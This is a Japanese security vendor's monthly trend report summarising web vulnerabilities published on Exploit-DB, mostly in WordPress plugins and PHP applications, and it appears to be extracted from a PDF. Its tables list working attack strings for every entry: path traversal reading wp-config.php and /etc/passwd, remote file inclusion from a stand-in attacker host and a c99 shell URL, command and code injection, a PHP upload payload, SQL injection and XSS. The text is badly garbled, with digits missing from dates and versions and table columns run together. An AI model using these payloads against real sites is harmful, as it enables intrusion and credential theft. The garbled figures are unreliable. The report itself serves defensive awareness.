EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

05.

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05 年 月に公開されたExploit-DBの分析結果 Local File Inclusion 攻撃に対する報告件数が最も多かったです 分析されたLocal File Inclusion 攻撃は含めているファイルの内容を開けてみる簡単なから特定命令を実行させるまで攻撃難易度の側面では多様でしたが 危険度面では全て高いでした また 特定のアプリケーションと関連し パラメータの値ではなく パラメータキーを狙うLocal File Inclusion 攻撃も発見され 今回が発見されたソフトウェアを使用する管理者は該当関連セキュリティパッチを実施したり "../" と同じ文字列をフィルターしたり エラーページ公開を禁じるなどの対応を実施して特定ファイルが露出されたり 実行にならないように注意しなければなりません 主要ソフトウェア別発生の現況を見ると 世界的に代表的なCMS Wordpressが最も多いが報告されました 使用者が多く Pluginも多様に提供されるWordpressは ハッカーの主な攻撃対象となるため が発見されたPluginを使用する管理者は常に最新のアップデートを維持しなければなりません. 別件数 カテゴリ 件数 Command Injection 別件数 9 4 0 File Upload Code Injection RFI 5 SQL インジェクション (SQL Injection) クロスサイトスクリプティング (Cross Site Scripting : XSS) LFI 合計 7 6 9 Command File Upload Injection Code Injection 5 RFI 6 SQL インジェククロスサイトスションクリプティング (SQL (Cross Site Injection) Scripting : XSS) LFI 8 6 4 0 危険度別分類. 危険度別件数 危険度 件数 割合 早急対応要 0 7% 高 7 7% 合計 7 00% 7 0 早急対応要 高 攻撃実行の難易度別件数. 攻撃実行の難易度別件数 難易度 件数 割合 難 5% 中 8% 易 86% 合計 7 00% 難 中 易 主なソフトウェア別発生件数 4. 主なソフトウェア別発生件数ソフトウェア名 dotcms Bigware OpenMRS ECommerceMajor PHP Utility Belt Zen Cart Zenphoto ArticleSetup SIMOGEO FileManager PFSense iy0 Dizin Scripti Beezfud bitrix.xscan Bitrix module bitrix.mpbuilder Bitrix module 合計 件数 4 7 4 dotcms Bigware OpenMRS ECommerceMajor PHP Utility Belt Zen Cart Zenphoto ArticleSetup SIMOGEO FileManager PFSense iy0 Dizin Scripti Beezfud bitrix.xscan Bitrix module Copyright 05 Penta Security Systems Inc. All rights reserved

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 危険度分類基準 早急対応要 : 攻撃が成功した場合システムへ侵入可 高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩 攻撃実行難易度分類基準 難 : 複数のを突いた攻撃パターン 対象のシステムの重要な情報を取得 するため 高度な攻撃コードを採用したパターン 知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン 易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号 カテゴリ 攻撃難易度 危険度 名 ソフトウェア名 886 RFI 易 高 Gwolle Guestbook Plugin.5. - ajaxresponse.php RFI 8856 XSS 易 高 Users Ultra Plugin.5.50 - admin-ajax.php XSS 8855 SQL Injection 易 高 Users Ultra Plugin.5.50 - admin-aja= x.php SQL Injection 8869 LFI 易 早急対応要 Plugin TheCartPress v.4.7 - Miranda.class.php LFI 8869 Command Injection 中 早急対応要 Plugin TheCartPress v.4.7 - Command injection 8868 LFI 易 早急対応要 Plugin Sell Download v.0.6 - sell-downloads.php Command injection 8867 File Upload 易 高 Plugin Advanced uploader v.0 - upload.php File Upload 8867 LFI 易 早急対応要 Plugin Advanced uploader v.0 - upload.php LFI 890 SQL Injection 難 早急対応要 Polls Widget Plugin.0.7 - admin-ajax.php SQL Injection 895 XSS 易 高 Plugin WP Easy Poll.. - admin.php XSS 8966 XSS 易 高 Admin Management Xtended Plugin.4.0 - admin-ajax.php XSS 9 SQL Injection 難 早急対応要 Simple Ads Manager.9.4.6 - sam-ajax-loader.php SQL Injection Copyright 05 Penta Security Systems Inc. All rights reserved

日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 05--0 884 LFI 易高 05--0 886 RFI 易高 05--0 8856 XSS 易高 EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です Zenphoto.4.0 - plugindoc.php LFI Gwolle Guestbook Plugin.5. - ajaxresponse.php RFI Users Ultra Plugin.5.50 - admin-ajax.php XSS /zenphoto-zenphoto-.4.0/zpcore/plugindoc.php?thirdparty=&extension=../../../x ampp/phpinfo /wp-content/plugins/gwollegb/frontend/captcha/ajaxresponse.php?abspath=http:// www.hacker.com/index.php POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Zenphoto Zenphoto.4.0 Gwolle Guestbook Plugin.5. Users Ultra Plugin.5.50 05--0 8855 SQL Injection 易高 Users Ultra Plugin.5.50 - admin-aja= x.php SQL Injection action=package_add_new&p_name=a<script>alert()</scr ipt> POST /wp-admin/admin-ajax.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Users Ultra Plugin.5.50 05--04 8869 LFI 易 早急対応要 05--04 8869 Command Injection 中 早急対応要 05--04 8868 LFI 易 早急対応要 05--04 8867 File Upload 易 高 Plugin TheCartPress v.4.7 - Miranda.class.php LFI Plugin TheCartPress v.4.7 - Command injection Plugin Sell Download v.0.6 - selldownloads.php Command injection Plugin Advanced uploader v.0 - upload.php File Upload action=edit_video&video_id= and sleep(5) /wpcontent/plugins/thecartpress/modules/miranda.class.p hp?page=../../../../../../../../wp-config.php%00 /wp/adminajax.php?action=tcp_miranda_save_admin_panel&class=l s -al /wp-content/plugins/sell-downloads/selldownloads.php?file=../../../../../../../../.././wpconfig.php%00 POST /wp-content/plugins/advanceduploader/upload.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=-------- -------------------7dd009908f Plugin TheCartPress v.4.7 Plugin TheCartPress v.4.7 Plugin Sell Download v.0.6 Plugin Advanced uploader v.0 -----------------------------7dd009908f Content-Disposition: form-data; name="file"; filename="@kd.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05--04 8867 LFI 易早急対応要 Plugin Advanced uploader v.0 - upload.php LFI /wp-content/plugins/advanceduploader/upload.php?destinations=../../../../../../../../../wp-config.php%00 Plugin Advanced uploader v.0 05--08 8906 XSS 易상 05--08 8906 XSS 易早急対応要 05--08 8906 XSS 易早急対応要 dotcms..4 - TagAjax.addTag.dwr XSS dotcms..4 - CategoryAjax.saveOrUpdateCate gory.dwr XSS dotcms..4 - /c/portal/layout XSS POST /dwr/call/plaincall/tagajax.addtag.dwr HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 c0-param0=<script>alert()<%fscript> POST /dwr/call/plaincall/categoryajax.saveorupdatecategor y.dwr HTTP/. POST /c/portal/layout?p_l_id=a8e40e-800-40cf- ade- 5978e64a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 offset="><script>alert()<%fscript> dotcms dotcms..4 dotcms dotcms..4 dotcms dotcms..4 Copyright 05 Penta Security Systems Inc. All rights reserved

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 05--08 890 SQL Injection 難早急対応要 05--08 890 Code injection 中高 05--08 8899 LFI 易高 05--08 8898 XSS 易高 Polls Widget Plugin.0.7 - admin-ajax.php SQL Injection PHP Utility Belt - ajax.php Code injection OpenMRS. - viewportlet.htm LFI OpenMRS. - cohortreport.form XSS POST /wp-admin/adminajax.php?action=pollinsertvalues HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 question_id=7 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(se lect(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0xc67e,table_name))))a)),-- - &poll_answer_securety=4ac4f87e&date_answers[0]=5 POST /php-utility-belt/ajax.php HTTP/. Polls Widget Plugin.0.7 PHP Utility Belt PHP Utility Belt User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 /openmrs/module/reporting/viewportlet.htm?id=reportd esignportlet&url=..%f..%f..%fweb- OpenMRS OpenMRS. POST /openmrs/admin/reports/cohortreport.form HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 OpenMRS OpenMRS. 05--08 8895 LFI 中早急対応要 05--09 895 XSS 易高 SIMOGEO FileManager..0 - filemanager.php LFI Plugin WP Easy Poll.. - admin.php XSS parentuuid=7ddec8-60be-47-9dd-7 9cdc44&name="><script>alert(&#4;</scr ipt>&description="><script>alert(&#4;</scr ipt> /Filemanager/connectors/php/filemanager.php?mode=pre view&path=//...//...//...//...//...//...//... //...//...//etc/passwd POST /wordpress/wpadmin/admin.php?page=easy_polls&action=add HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 SIMOGEO FileManager SIMOGEO FileManager..0 Plugin WP Easy Poll.. 05--0 897 SQL Injection 易高 iy0 Dizin Scripti - /admin SQL Injection p_ques=<script>alert(document.cookie)</script> POST /admin HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 iy0 Dizin Scripti iy0 Dizin Scripti 05--4 8976 LFI 易高 05--4 8975 LFI 易高 Bitrix bitrix.xscan Module.0. - bitrix.xscan_worker.php LFI Bitrix bitrix.mpbuilder Module.0.0 - bitrix.mpbuilder_step.php LFI id='or' =&pw='or' = /admin/bitrix.xscan_worker.php?action=prison&file=/u pload/main/77f/image.jpg../../../../../bitrix/.setti ngs.php POST /bitrix/admin/bitrix.mpbuilder_step.php?module_id=b log HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 bitrix.xscan Bitrix module bitrix.mpbuilder Bitrix module bitrix.xscan Bitrix module.0. bitrix.mpbuilder Bitrix module.0.0 save=&work[/../../../../../../../../../../../../../../../../../../tmp/file]= 05--4 8966 XSS 易高 Admin Management Xtended Plugin.4.0 - adminajax.php XSS POST /wp-admin/admin-ajax.php?action=ame_save_title HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 Admin Management Xtended Plugin.4.0 05--4 8965 SQL Injection 易 高 05--5 8989 RFI 易 高 05--5 8984 LFI 易 高 05--5 8984 XSS 易 高 05--5 8984 XSS 易 高 ECommerceMajor - productdtl.php SQL Injection bulletindoc Module.9 - admin.php RFI File Hosting.5 - download.php LFI File Hosting.5 - files.php XSS File Hosting.5 - file.php XSS category_id=&new_title=<script>alert(document.cooki e);</script> /ecommercemajor/productdtl.php?prodid=%0and%0=- - /bulletindoc-- 9/programs/admin.php?babInstallPath=http://www.hacke r.com/index.php /tequila/download.php?filename=files/../../../../../ etc/passwd&name=passwd /files.php?folder="><script>alert('ehsan')</script> /file.php?file="><script>alert('ehsan')</script> ECommerceMajor ECommerceMajor bulletindoc Module.9 File Hosting.5 File Hosting.5 File Hosting.5 Copyright 05 Penta Security Systems Inc. All rights reserved

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 05--5 898 RFI 易高 05--5 8990 SQL Injection 易高 05--7 907 LFI 易高 05--8 908 LFI 易高 05--8 904 RFI 易高 05-- 9068 RFI 易高 05-- 908 LFI 易高 05-- 908 LFI 易高 05--4 909 Code Injection 易高 05--0 9 SQL Injection 難早急対応要 absences Module.64 - planning.php RFI ArticleSetup Article Script.00 - article.php SQL Injection /absences-- 64/programs/planning.php?GLOBALS[babInstallPath]=htt p://www.hacker.com/index.php /article.php?id=%0and%0=-- ArticleSetup absences Module.64 ArticleSetup Article Script.00 Zen Cart.5.4 - ajax.php LFI /ajax.php?method=&act=/../../../../tmp/file Zen Cart Zen Cart.5.4 PFSense <=..5 - wizard.php LFI /wizard.php?xml=../../../.xml PFSense PFSense <=..5 /maillist-4- maillist Module 4.0 0/programs/mlincl.php?GLOBALS[babInstallPath]=http:/ maillist Module - mlincl.php RFI /yourshellpath.com/c99.txt 4.0 /online-- 8/programs/admin.php?GLOBALS[babAddonPhpPath]=http:/ online Module.8 - admin.php RFI /www.hacker.com/index.php Bigware Shop..0 - main_bigware_.php LFI Bigware Shop..0 - main_bigware_5.php LFI Beezfud - index.php Code Injection Simple Ads Manager.9.4.6 - sam-ajax-loader.php SQL Injection /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_.php?language=/../../../../index.php /Bigware_Shop/modules/basic_pricing/configmain/main_ bigware_5.php?language=/../../../../index.php /beezfud/index.php?lookback=;echo%0%7<?php%0phpin fo();%0?>%7%0>info.php; POST /wp-content/plugins/simple-ads-manager/samajax-loader.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 action=load_place&id=0&pid=&wc=yto0ontzoji6ilddijtz OjM6IjE9MCI7czozOiJXQQiOM6MDoiIjtzOjM6IldDVyI7czox MTg6IikgVU5JT04gKFNFTEVDVCBcVyXBhcMsIDEsIDIsIDMs IDQsIDUsIDYsIDcsIDgsIDksIDAsIDEsIDIsIDMsIDQsIDUsIDYs IDcsIDgsIDksIDAsIDEsIDIgRlJPTSBcF9cVycyBXSEVSRSBJ RCA9IDEiOM6NDoiV0MyVyI7czowOiIiO0= Bigware Bigware Beezfud online Module.8 Bigware Shop..0 Bigware Shop..0 Beezfud Simple Ads Manager.9.4.6 Copyright 05 Penta Security Systems Inc. All rights reserved

Copyright 05 Penta Security Systems Inc. All rights reserved

Copyright 05 Penta Security Systems Inc. All rights reserved

Copyright 05 Penta Security Systems Inc. All rights reserved